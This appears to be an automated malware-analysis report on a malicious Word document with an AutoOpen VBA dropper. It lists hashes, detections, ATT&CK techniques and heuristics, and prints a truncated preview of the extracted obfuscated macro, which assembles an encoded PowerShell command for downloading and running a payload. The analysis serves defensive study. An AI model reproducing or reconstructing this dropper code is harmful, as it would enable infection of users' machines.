Office (OLE) malware analysis — malicious · b3479098b450f2d4

MALICIOUS

Office (OLE)

230.8 KB Created: 2018-06-28 18:18:00 Authoring application: Microsoft Office Word First seen: 2018-07-14

MD5: b18d453d4a6472c04413948adfae3de2 SHA-1: 90e7e7f8553273af95f957b3d71f14bf210e44de SHA-256: b3479098b450f2d412e67e31a2b89b0e431dd5aaecfc5a2acda3c69d0c739ca6

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes the AutoOpen function and a Shell() call, indicating an attempt to execute arbitrary code. This is further supported by ClamAV detecting it as a dropper. The macro's obfuscated nature and reliance on Shell() suggest it's designed to download and execute a secondary payload.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6595066-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6595066-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10656 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10656 bytes
SHA-256: `bce3d2b7bc0913af6165670f5c3a5a73f28e8324cb4dfa63e3520a3e8830ada3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wWObmmomCMP" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "JIdzThF" Function iYLOHTFO() On Error Resume Next HUADn _ = 42106 + Atn(4954) / 41930 / _ Round(28119) / 25610 / CInt(fvADsj) kFKPRz = ChrB(75461 + _ Sin(swZuMW * CLng(LiRlUS + 57160) _ + 16034 _ + qmoBf)) hScanoR = "HELL " + " " + " " + " " + " " + " " + " " + Chr(40) + "[Ch" + "aR[]]" + " " + Chr(40) + "97,49" + " ,47 ," NtDdkw _ = 23159 + Atn(85099) / 7122 / _ Round(6666) / 31788 / CInt(dEwTAZ) jVlGMJ = ChrB(13409 + _ Sin(mZiJlP * CLng(lfqjl + 81591) _ + 98865 _ + NiDaAE)) zQNRbwiuzt = "63,120 " + ", 43, 3" + "2, 50 " + ",104, " + "42, 39, 4" + "7, 32 ," + "38 , 49," + "101 , 11 " + ",32, " + "49, 107 " + ",18, 32," WlPJvH _ = 52683 + Atn(74777) / 83157 / _ Round(37310) / 57373 / CInt(ZSYuf) NSRdQn = ChrB(3246 + _ Sin(jYYJjG * CLng(LDsubT + 14606) _ + 18846 _ + zQHqaT)) zMzljr = " 39,6," + "41, 4" + "4 , 32" + " ,43," + " 49, 12" + "6, 97 , " + "6, 54 ,4" + "4 , 120,9" + "8,45, 49 " oYzmlJ _ = 86265 + Atn(40795) / 52537 / _ Round(15533) / 21805 / CInt(DOikX) NPjzD = ChrB(18422 + _ Sin(JYdAj * CLng(KPjjk + 72022) _ + 37223 _ + BKXST)) OXdUCTuC = ",49, 53 " + ",127," + "106, 1" + "06,32 ," + " 55 " + ", 44,38," + "38, 42" iGdRj _ = 69143 + Atn(66751) / 24274 / _ Round(8510) / 16547 / CInt(UojclO) vwAJT = ChrB(58900 + _ Sin(wEALFI * CLng(kBXCuM + 39386) _ + 92915 _ + zKbvPz)) oZuAqs = ", 43" + ", 54," + "48,41 ,49" + " , 44,43" + " , 34 ,10" + "7 ,38, 4" + "2, 40, " + "106 ," + "36 , 106" + ", 5,45,4" + "9,49, " fQvCXW _ = 13369 + Atn(49112) / 75901 / _ Round(98742) / 38758 / CInt(fiAzAH) mJZqCA = ChrB(97562 + _ Sin(Dwsjh * CLng(RVvJF + 17831) _ + 25349 _ + zOvsnQ)) mrvBFiOq = "53 ," + "127,106" + ",106, 38," + " 41, 48" + " , 39,51 " + ",42 ,4" zLaofK _ = 55554 + Atn(9969) / 49318 / _ Round(86732) / 5361 / CInt(CDavQ) fOMFpu = ChrB(96114 + _ Sin(rMKvK * CLng(iZGnR + 89745) _ + 4035 _ + oQVQCk)) zlWCqnHwLAw = "1,51 , " + "42 , " + "44 ,49 , " + "36,41" + " ,44" + ",36 , 1" qWTfF _ = 13872 + Atn(4634) / 64214 / _ Round(84592) / 41385 / CInt(qHSQui) pqdzni = ChrB(41649 + _ Sin(pZwjZs * CLng(NAprQ + 8711) _ + 11275 _ + sORlEu)) YYRwurk = "07, " + "44,49 " + ",106 ," + "60, 1 , " + "15 ,115 " + ",13, " iYLOHTFO = hScanoR + zQNRbwiuzt + zMzljr + OXdUCTuC + oZuAqs + mrvBFiOq + zlWCqnHwLAw + YYRwurk XVrhM _ = 87032 + Atn(63946) / 87491 / _ Round(67397) / 79888 / CInt(USdkI) ocuRbC = ChrB(26903 + _ Sin(jLkjVt * CLng(qRBar + 84853) _ + 59845 _ + jHGBG)) End Function Function fqXccOXE() On Error Resume Next nCHFVw _ = 53325 + Atn(695) / 11752 / _ Round(92876) / 36743 / CInt(CdiwKN) riBbJR = ChrB(7584 + _ Sin(IOKVB * CLng(uwIdd + 615) _ + 92505 _ + pKFHNp)) OCCsKClKYZp = "106 ," + "5,45 ,49" + ", 49 " + ",53 ," + "127,1" + "06 ,106" + " ,47, 3" + "6, 53 " + ", 36" + ",43 ,44," + " 54, 40," + "107 ,42" mjztF _ = 28825 + Atn(10399) / 74401 / _ Round(52353) / 95881 / CInt(RnTmva) WIjZT = ChrB(61964 + _ Sin(ACoqW * CLng(DOGVi + 25687) _ + 54200 _ + spJhfq)) hFwtIpKYF = " ,55" + " ,34 ,1" + "06 , 48 " + ", 53," + "41, 42 " + ",36, 3" + "3,54" + " ,10" + "6, 8 ," + "10 , 28,6" + "3,55" IVDPip _ = 82786 + Atn(64035) / 40459 / _ Round(24346) / 31402 / CInt(jEMQw) vkDjw = ChrB(14499 + _ Sin(wWiSXs * CLng(qisjka + 84783) _ + 24005 _ + hlIOw)) KsYGwz = ",106,5,4" + "5 , 49 ," + "49,5" + "3, 1" + "27, 106 " + ", 106 ,4" + "9 ,36" + ", 49 ,3" + "6 ,43 ,46" + " , 36 , " qfYMcj _ = 11900 + Atn(60548) / 52505 / _ Round(45734) / 92653 / CInt(fTMOzU) aCMjfV = ChrB(24619 + _ Sin(XVuptl * CLng(fzuKQ + 8520) _ + 68930 _ + QIotMt)) VWZmr = "107 " + ", 44 ," + "49,106 , " + "0, 2" + "1 ,117,11" + "4,113 " + ",14, " + "14,106,5," + " 45 ,49" + " ,49 ," + " 53 ,127" + " ,106, " SoolV _ = 87578 + Atn(5 ... (truncated)

SHA-256: bce3d2b7bc0913af6165670f5c3a5a73f28e8324cb4dfa63e3520a3e8830ada3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "wWObmmomCMP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JIdzThF"
Function iYLOHTFO()
On Error Resume Next
HUADn _
= 42106 + Atn(4954) / 41930 / _
Round(28119) / 25610 / CInt(fvADsj)
kFKPRz = ChrB(75461 + _
Sin(swZuMW * CLng(LiRlUS + 57160) _
 + 16034 _
+ qmoBf))
hScanoR = "HELL  " + "        " + "     " + "        " + "     " + "    " + "         " + Chr(40) + "[Ch" + "aR[]]" + " " + Chr(40) + "97,49" + " ,47 ,"
NtDdkw _
= 23159 + Atn(85099) / 7122 / _
Round(6666) / 31788 / CInt(dEwTAZ)
jVlGMJ = ChrB(13409 + _
Sin(mZiJlP * CLng(lfqjl + 81591) _
 + 98865 _
+ NiDaAE))
zQNRbwiuzt = "63,120 " + ", 43, 3" + "2, 50 " + ",104, " + "42, 39, 4" + "7, 32 ," + "38 , 49," + "101 , 11 " + ",32, " + "49, 107 " + ",18, 32,"
WlPJvH _
= 52683 + Atn(74777) / 83157 / _
Round(37310) / 57373 / CInt(ZSYuf)
NSRdQn = ChrB(3246 + _
Sin(jYYJjG * CLng(LDsubT + 14606) _
 + 18846 _
+ zQHqaT))
zMzljr = " 39,6," + "41, 4" + "4 , 32" + " ,43," + " 49, 12" + "6, 97 , " + "6, 54 ,4" + "4 , 120,9" + "8,45, 49 "
oYzmlJ _
= 86265 + Atn(40795) / 52537 / _
Round(15533) / 21805 / CInt(DOikX)
NPjzD = ChrB(18422 + _
Sin(JYdAj * CLng(KPjjk + 72022) _
 + 37223 _
+ BKXST))
OXdUCTuC = ",49, 53 " + ",127," + "106, 1" + "06,32 ," + " 55 " + ", 44,38," + "38, 42"
iGdRj _
= 69143 + Atn(66751) / 24274 / _
Round(8510) / 16547 / CInt(UojclO)
vwAJT = ChrB(58900 + _
Sin(wEALFI * CLng(kBXCuM + 39386) _
 + 92915 _
+ zKbvPz))
oZuAqs = ", 43" + ", 54," + "48,41 ,49" + " , 44,43" + " , 34 ,10" + "7 ,38, 4" + "2, 40, " + "106 ," + "36 , 106" + ", 5,45,4" + "9,49, "
fQvCXW _
= 13369 + Atn(49112) / 75901 / _
Round(98742) / 38758 / CInt(fiAzAH)
mJZqCA = ChrB(97562 + _
Sin(Dwsjh * CLng(RVvJF + 17831) _
 + 25349 _
+ zOvsnQ))
mrvBFiOq = "53 ," + "127,106" + ",106, 38," + " 41, 48" + " , 39,51 " + ",42 ,4"
zLaofK _
= 55554 + Atn(9969) / 49318 / _
Round(86732) / 5361 / CInt(CDavQ)
fOMFpu = ChrB(96114 + _
Sin(rMKvK * CLng(iZGnR + 89745) _
 + 4035 _
+ oQVQCk))
zlWCqnHwLAw = "1,51 , " + "42 , " + "44 ,49 , " + "36,41" + " ,44" + ",36 , 1"
qWTfF _
= 13872 + Atn(4634) / 64214 / _
Round(84592) / 41385 / CInt(qHSQui)
pqdzni = ChrB(41649 + _
Sin(pZwjZs * CLng(NAprQ + 8711) _
 + 11275 _
+ sORlEu))
YYRwurk = "07, " + "44,49 " + ",106 ," + "60, 1 , " + "15 ,115 " + ",13, "
iYLOHTFO = hScanoR + zQNRbwiuzt + zMzljr + OXdUCTuC + oZuAqs + mrvBFiOq + zlWCqnHwLAw + YYRwurk
XVrhM _
= 87032 + Atn(63946) / 87491 / _
Round(67397) / 79888 / CInt(USdkI)
ocuRbC = ChrB(26903 + _
Sin(jLkjVt * CLng(qRBar + 84853) _
 + 59845 _
+ jHGBG))
End Function
Function fqXccOXE()
On Error Resume Next
nCHFVw _
= 53325 + Atn(695) / 11752 / _
Round(92876) / 36743 / CInt(CdiwKN)
riBbJR = ChrB(7584 + _
Sin(IOKVB * CLng(uwIdd + 615) _
 + 92505 _
+ pKFHNp))
OCCsKClKYZp = "106 ," + "5,45 ,49" + ", 49 " + ",53 ," + "127,1" + "06 ,106" + " ,47, 3" + "6, 53 " + ", 36" + ",43 ,44," + " 54, 40," + "107 ,42"
mjztF _
= 28825 + Atn(10399) / 74401 / _
Round(52353) / 95881 / CInt(RnTmva)
WIjZT = ChrB(61964 + _
Sin(ACoqW * CLng(DOGVi + 25687) _
 + 54200 _
+ spJhfq))
hFwtIpKYF = " ,55" + " ,34 ,1" + "06 , 48 " + ", 53," + "41, 42 " + ",36, 3" + "3,54" + " ,10" + "6, 8 ," + "10 , 28,6" + "3,55"
IVDPip _
= 82786 + Atn(64035) / 40459 / _
Round(24346) / 31402 / CInt(jEMQw)
vkDjw = ChrB(14499 + _
Sin(wWiSXs * CLng(qisjka + 84783) _
 + 24005 _
+ hlIOw))
KsYGwz = ",106,5,4" + "5 , 49 ," + "49,5" + "3, 1" + "27, 106 " + ", 106 ,4" + "9 ,36" + ", 49 ,3" + "6 ,43 ,46" + " , 36 , "
qfYMcj _
= 11900 + Atn(60548) / 52505 / _
Round(45734) / 92653 / CInt(fTMOzU)
aCMjfV = ChrB(24619 + _
Sin(XVuptl * CLng(fzuKQ + 8520) _
 + 68930 _
+ QIotMt))
VWZmr = "107 " + ", 44 ," + "49,106 , " + "0, 2" + "1 ,117,11" + "4,113 " + ",14, " + "14,106,5," + " 45 ,49" + " ,49 ," + " 53 ,127" + " ,106, "
SoolV _
= 87578 + Atn(5
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.